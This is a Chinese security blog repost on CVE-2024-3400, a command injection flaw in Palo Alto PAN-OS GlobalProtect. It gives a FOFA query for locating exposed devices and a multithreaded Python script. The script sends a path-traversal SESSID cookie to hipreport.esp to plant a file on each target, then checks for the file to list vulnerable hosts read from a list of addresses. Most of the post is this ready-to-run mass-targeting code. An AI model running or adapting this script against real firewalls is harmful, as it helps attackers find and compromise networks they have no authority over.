CVE-2024-3400

2024年4月19日02:36:09评论50 views字数 2016阅读6分43秒阅读模式

漏洞描述

Palo Alto Networks PAN-OS 软件的 GlobalProtect功能中存在命令注入漏洞，该漏洞影响启用了 GlobalProtect 网关和设备遥测配置的 PAN-OS 10.2、PAN-OS 11.0 和 PAN-OS 11.1 防火墙，未经身份验证的威胁者可利用该漏洞在防火墙上以root权限执行任意代码。

资产测绘

FOFA：app="paloalto-GlobalProtect"

漏洞复现

import random
import string
from concurrent.futures import ThreadPoolExecutor
import urllib3
import requests

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
resFile = open("resFile.txt", "w")

def GenerateRandomString(length):
    characters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(characters) for _ in range(length))

def CheckFile(url, proxy, filename):
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    }
    resp1 = requests.get(url=url + f"/global-protect/portal/images/{filename}.txt", headers=headers, proxies=proxy, verify=False, allow_redirects=False, timeout=10)
    resp2 = requests.get(url=url + f"/global-protect/portal/images/{filename}_cve_test.txt", headers=headers, proxies=proxy,
                         verify=False, allow_redirects=False, timeout=10)
    if resp1.status_code == 403 and resp2.status_code == 404:
        return True
    else:
        return False

def CreateFile(url, proxy):
    filename = GenerateRandomString(10)
    headers = {
        "Cookie": f"SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{filename}.txt;",
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    }
    resp = requests.post(url=url + "/ssl-vpn/hipreport.esp", headers=headers, proxies=proxy, verify=False, allow_redirects=False, timeout=10)
    if resp.status_code == 200:
        if CheckFile(url, proxy, filename):
            print(f"[+] {url}")
            resFile.write(f"{url}\n")


def GetUrls():
    with open("ip_all.txt","r") as f:
        for address in f.readlines():
            address = address.strip()
            yield address

if __name__ == "__main__":
    # proxy = {
    #     "http": "http://127.0.0.1:8080",
    #     "https": "http://127.0.0.1:8080"
    # }
    proxy = {}
    addrs = GetUrls()
    max_thread_num = 30
    executor = ThreadPoolExecutor(max_workers=max_thread_num)
    for addr in addrs:
        future = executor.submit(CreateFile, addr, proxy)

原文始发于微信公众号（漏洞文库）：【漏洞复现】CVE-2024-3400

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2024-3400

漏洞描述

漏洞复现

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

漏洞预警 | 大华智慧园区综合管理平台远程代码执行漏洞

漏洞预警 | JeecgBoot任意文件上传漏洞

漏洞预警 | 若依druid未授权访问漏洞

Cisco IOS XE Web UI存在权限提升漏洞(CVE-2023-20198)

【0day】KingPortal运行系统信息泄露漏洞【未公开|附poc】

LiveGBS user/save存在逻辑缺陷漏洞(CNVD-2023-72138)

发表评论

在线咨询

微信